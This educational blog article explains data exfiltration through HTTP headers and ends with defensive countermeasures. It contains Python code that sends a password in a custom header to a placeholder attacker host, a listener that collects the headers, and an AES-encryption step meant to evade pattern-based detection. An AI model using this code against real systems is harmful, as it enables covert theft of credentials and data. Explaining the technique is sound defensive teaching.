 |
HTTP header exfiltration occurs when an attacker inserts sensitive data (e.g. credentials, tokens, file contents, etc.) into the HTTP headers of a request that is forwarded to a server controlled by the attacker. Headers are fields like User-Agent, Referer, Cookie, X-Forwarded-For, Authorization, or custom headers (X-Custom-Header).
๐ What is it
Relayed Data Exfiltration via HTTP Headers is an advanced technique used by attackers to steal sensitive data by exploiting seemingly harmless HTTP headers. This type of exfiltration is particularly insidious because it can bypass corporate firewalls, WAFs, and proxies, blending in with legitimate traffic.
⚙️ How it works
The mechanism is based on the insertion of exfiltrated data into one or more HTTP headers of a request that is forwarded ("relayed") by a web application — often via vulnerabilities such as SSRF, RFI, or proxy misconfigurations.
๐ Typical attack flow
- The attacker exploits an entry point (e.g. user input or vulnerability) to cause a victim's server to generate an HTTP request.
- The data to be exfiltrated are inserted into an HTTP header such as
User-Agent,Referer, or a custom header (X-Secret-Data). - The victim's server sends the request to a domain controlled by the attacker.
- The attacker's server reads the HTTP headers and extracts the stolen data.
๐งช Exfiltration example (in python)
✅ Data sending script
import requests
# Sensitive data to exfiltrate
secret_data = "password=SuperSecret123"
# Attacker's server
attacker_url = "http://attacker.example.com/collect"
# Header containing the data
headers = {
"User-Agent": "Mozilla/5.0",
"X-Secret-Data": secret_data
}
requests.get(attacker_url, headers=headers)
✅ Listener to intercept headers
from http.server import BaseHTTPRequestHandler, HTTPServer
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
for key, value in self.headers.items():
print(f"{key}: {value}")
self.send_response(200)
self.end_headers()
self.wfile.write(b"OK")
HTTPServer(('', 8000), Handler).serve_forever()
๐ต️♂️ Encrypting data in headers
To make exfiltration even more difficult to detect, an attacker can encrypt data before inserting it into headers. This completely hides the content even from inspection tools that look for known patterns.
๐ Example with Base64 encoding + AES encryption
from Crypto.Cipher import AES
import base64
key = b'Sixteen byte key'
cipher = AES.new(key, AES.MODE_ECB)
plaintext = b"token=ABC123"
padded = plaintext + b' ' * (16 - len(plaintext) % 16)
encrypted = cipher.encrypt(padded)
encoded = base64.b64encode(encrypted).decode()
headers = {
"X-Secret-Data": encoded
}
The recipient of the data can only decrypt it by knowing the symmetric key. This makes pattern-based detection ineffective.
⚠️ Important Note
Code examples are for educational and local testing purposes only. Use on unauthorized systems is illegal and unethical in computing.
๐งฑ Defense Techniques
✅ Best Practices and Countermeasures
- Check and validate outgoing HTTP headers.
- Limit destination domains for internally generated HTTP traffic.
- Use deep packet inspection firewalls and proxies.
- Monitor for anomalous or rare headers such as
X-*,Authorization,Refererwith non-standard payloads. - Block or control SSRF/RFI and limit access to internal endpoints.
- Decode and inspect content encoded or encrypted in suspicious traffic logs.
๐งญ Conclusion
Relayed Data Exfiltration via HTTP Headers is a sneaky yet effective technique. Thanks to its ability to disguise itself in legitimate traffic and, if necessary, to encrypt payloads, it represents a concrete threat especially for cloud infrastructures or poorly configured microservices.
It is therefore essential to adopt a proactive approach, combining visibility, traffic control and secure development practices.
Follow me #techelopment
Official site: www.techelopment.it
facebook: Techelopment
instagram: @techelopment
X: techelopment
Bluesky: @techelopment
telegram: @techelopment_channel
whatsapp: Techelopment
youtube: @techelopment
